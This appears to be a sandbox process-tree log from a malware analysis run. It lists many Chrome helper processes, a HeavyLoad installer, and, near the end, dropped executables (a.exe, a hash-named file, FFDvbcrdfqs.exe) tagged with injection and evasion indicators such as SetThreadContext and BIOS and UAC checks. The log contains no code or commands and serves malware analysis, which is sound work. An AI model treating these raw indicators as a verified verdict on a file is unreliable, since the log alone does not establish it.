                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2444 /prefetch:8
                                                          2⤵
                                                            PID:1952
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3016 /prefetch:1
                                                            2⤵
                                                              PID:3740
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3088 /prefetch:1
                                                              2⤵
                                                                PID:1528
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
                                                                2⤵
                                                                  PID:5024
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4424 /prefetch:8
                                                                  2⤵
                                                                    PID:5376
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4560 /prefetch:8
                                                                    2⤵
                                                                      PID:880
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4680 /prefetch:8
                                                                      2⤵
                                                                        PID:5536
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 /prefetch:8
                                                                        2⤵
                                                                          PID:1708
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:1
                                                                          2⤵
                                                                            PID:4100
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
                                                                            2⤵
                                                                              PID:688
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3772 /prefetch:8
                                                                              2⤵
                                                                                PID:5044
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1592 /prefetch:8
                                                                                2⤵
                                                                                  PID:1504
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4604 /prefetch:8
                                                                                  2⤵
                                                                                    PID:2124
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4592 /prefetch:8
                                                                                    2⤵
                                                                                      PID:3496
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:8
                                                                                      2⤵
                                                                                        PID:3532
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2292 /prefetch:1
                                                                                        2⤵
                                                                                          PID:5416
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5636 /prefetch:8
                                                                                          2⤵
                                                                                            PID:4524
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5624 /prefetch:8
                                                                                            2⤵
                                                                                              PID:4316
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1
                                                                                              2⤵
                                                                                                PID:5932
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5896 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:5132
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6080 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:1208
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6188 /prefetch:1
                                                                                                    2⤵
                                                                                                      PID:5852
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3748 /prefetch:1
                                                                                                      2⤵
                                                                                                        PID:5464
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4668 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:5600
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5752 /prefetch:1
                                                                                                          2⤵
                                                                                                            PID:5376
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2764 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:1280
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2696 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:348
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5916 /prefetch:8
                                                                                                                2⤵
                                                                                                                  PID:2616
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2296 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:4780
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1104 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:5248
                                                                                                                    • C:\Users\Admin\Downloads\HeavyLoad-x64-Setup.exe
                                                                                                                      "C:\Users\Admin\Downloads\HeavyLoad-x64-Setup.exe"
                                                                                                                      2⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:1708
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-QUGHT.tmp\HeavyLoad-x64-Setup.tmp
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-QUGHT.tmp\HeavyLoad-x64-Setup.tmp" /SL5="$80458,14432063,857088,C:\Users\Admin\Downloads\HeavyLoad-x64-Setup.exe"
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Drops file in Program Files directory
                                                                                                                        PID:3016
                                                                                                                        • C:\Program Files\JAM Software\HeavyLoad\HeavyLoad.exe
                                                                                                                          "C:\Program Files\JAM Software\HeavyLoad\HeavyLoad.exe" /nogui /installcertificate
                                                                                                                          4⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies system certificate store
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:4176
                                                                                                                        • C:\Program Files\JAM Software\HeavyLoad\HeavyLoad.exe
                                                                                                                          "C:\Program Files\JAM Software\HeavyLoad\HeavyLoad.exe"
                                                                                                                          4⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Checks computer location settings
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:4248
                                                                                                                          • C:\Windows\System32\Taskmgr.exe
                                                                                                                            "C:\Windows\System32\Taskmgr.exe" open
                                                                                                                            5⤵
                                                                                                                              PID:3500
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3388 /prefetch:8
                                                                                                                        2⤵
                                                                                                                          PID:1324
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5108 /prefetch:2
                                                                                                                          2⤵
                                                                                                                            PID:2212
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4780 /prefetch:8
                                                                                                                            2⤵
                                                                                                                              PID:4888
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5560 /prefetch:8
                                                                                                                              2⤵
                                                                                                                                PID:5740
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5544 /prefetch:8
                                                                                                                                2⤵
                                                                                                                                  PID:5280
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5716 /prefetch:8
                                                                                                                                  2⤵
                                                                                                                                    PID:2044
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2736 /prefetch:1
                                                                                                                                    2⤵
                                                                                                                                      PID:3612
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
                                                                                                                                      2⤵
                                                                                                                                        PID:2220
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4456 /prefetch:8
                                                                                                                                        2⤵
                                                                                                                                          PID:3924
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5228 /prefetch:8
                                                                                                                                          2⤵
                                                                                                                                            PID:1488
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1
                                                                                                                                            2⤵
                                                                                                                                              PID:3164
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
                                                                                                                                              2⤵
                                                                                                                                                PID:3112
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6452 /prefetch:8
                                                                                                                                                2⤵
                                                                                                                                                  PID:5132
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4588 /prefetch:8
                                                                                                                                                  2⤵
                                                                                                                                                  • Modifies registry class
                                                                                                                                                  PID:5912
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4788 /prefetch:8
                                                                                                                                                  2⤵
                                                                                                                                                    PID:2124
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3272 /prefetch:8
                                                                                                                                                    2⤵
                                                                                                                                                      PID:4868
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5832 /prefetch:8
                                                                                                                                                      2⤵
                                                                                                                                                        PID:3684
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5716 /prefetch:8
                                                                                                                                                        2⤵
                                                                                                                                                          PID:5456
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5336 /prefetch:8
                                                                                                                                                          2⤵
                                                                                                                                                            PID:1704
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6088 /prefetch:8
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4240
                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6316 /prefetch:8
                                                                                                                                                              2⤵
                                                                                                                                                                PID:5148
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5936 /prefetch:8
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:4700
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3652 /prefetch:8
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:3452
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:1
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:948
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6740 /prefetch:1
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:5208
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6856 /prefetch:1
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:5232
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4856 /prefetch:8
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:4304
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6336 /prefetch:8
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:4276
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,15327261961007529900,5570278894753751589,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:3192
                                                                                                                                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:4852
                                                                                                                                                                              • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:1528
                                                                                                                                                                                • C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                                                  C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:5876
                                                                                                                                                                                  • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                    "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                    PID:2256
                                                                                                                                                                                  • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:1896
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\a.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\a.exe"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                      PID:552
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:5716
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                        PID:5700
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:5096
